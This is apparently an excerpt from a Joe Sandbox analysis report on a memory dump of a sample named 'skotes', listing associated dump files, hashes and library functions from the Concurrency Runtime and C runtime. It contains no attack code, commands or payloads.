Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
String ID:
API String ID: 1091748018-0
Opcode ID: 242879ec60693ce9f90720937aeab7b901373fb28f4dbc647fabf7091eafa1e6
Instruction ID: fa0aca9a163a5c9174cfa8c966d13996cd41015babca930bb7410a5819a05502
Opcode Fuzzy Hash: 242879ec60693ce9f90720937aeab7b901373fb28f4dbc647fabf7091eafa1e6
Instruction Fuzzy Hash: 2C41C670604214AFCB399B64C889BEDBB75AF45711F144059E9065B3C2CBF8AD49C7A1

Function 007556AF Relevance: 6.1, APIs: 4, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_InternalDeleteHelper.LIBCONCRT ref: 007556F2
_InternalDeleteHelper.LIBCONCRT ref: 00755726
Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 0075578B
SafeRWList.LIBCONCRT ref: 0075579A

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
String ID:
API String ID: 893951542-0
Opcode ID: a3b51100e1be61e0b88b018a75c7db14f83061b829669346b8c3f2b15687922d
Instruction ID: 0f9d843d039cde588da2c3d8c7ac3e64f5182926e1d7480c05685680d4cfaa48
Opcode Fuzzy Hash: a3b51100e1be61e0b88b018a75c7db14f83061b829669346b8c3f2b15687922d
Instruction Fuzzy Hash: FD312536B01510DFCF059F20C885AED73A6EFC8711F148178ED069B295DBB8AC098790

Function 00752CFC Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00752D0F

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: c8c8d4f68410096af0ff079ba9a3eb0ff48603feee51ebb608f3cf13fb34d969
Instruction ID: 7a788128039ac1dbe5b9cb2c926d600a1475eed65b10bcfb63d8a13a5caf7be4
Opcode Fuzzy Hash: c8c8d4f68410096af0ff079ba9a3eb0ff48603feee51ebb608f3cf13fb34d969
Instruction Fuzzy Hash: DD313A75A00309EFCF14DF94C4C4AEE7BB9BB45311F1404AADD01AB256D7B4A94ADBA0

Function 007613F5 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 007613FC
Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00761447
Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 0076147A
Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 0076152A

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
String ID:
API String ID: 2092016602-0
Opcode ID: f3c728ca8c69b79a2c70f099984282ed976f48756de8bff945f6c622ad3e928b
Instruction ID: 780a2771f2d9e39fd0845c96d904942bb6ca058c58bace24d3b088aff651c45b
Opcode Fuzzy Hash: f3c728ca8c69b79a2c70f099984282ed976f48756de8bff945f6c622ad3e928b
Instruction Fuzzy Hash: CF3173B1E00605DFCF14DFA8C4999EDFBB1BF48710B58822DE816A7391DB78A945CB90

Function 0074BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0074BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0074BBE4
_xtime_get.LIBCPMT ref: 0074BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0074BC13

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: be09204eac04e7313df27fd42ef57626f924714acfedefed4ff4203c1c515d22
Instruction ID: b5a971d734513cc652f157abeb7aaa23e16328067f382f18b52b7b790e152cd9
Opcode Fuzzy Hash: be09204eac04e7313df27fd42ef57626f924714acfedefed4ff4203c1c515d22
Instruction Fuzzy Hash: 38214C72E01119EFDF41EFA4DC859BEB7B9EF08710F114429FA01A7261DB389D059BA1

Function 00759C95 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00759C9C
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00759CE8
std::bad_exception::bad_exception.LIBCMT ref: 00759CFE
std::bad_exception::bad_exception.LIBCMT ref: 00759D6A

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
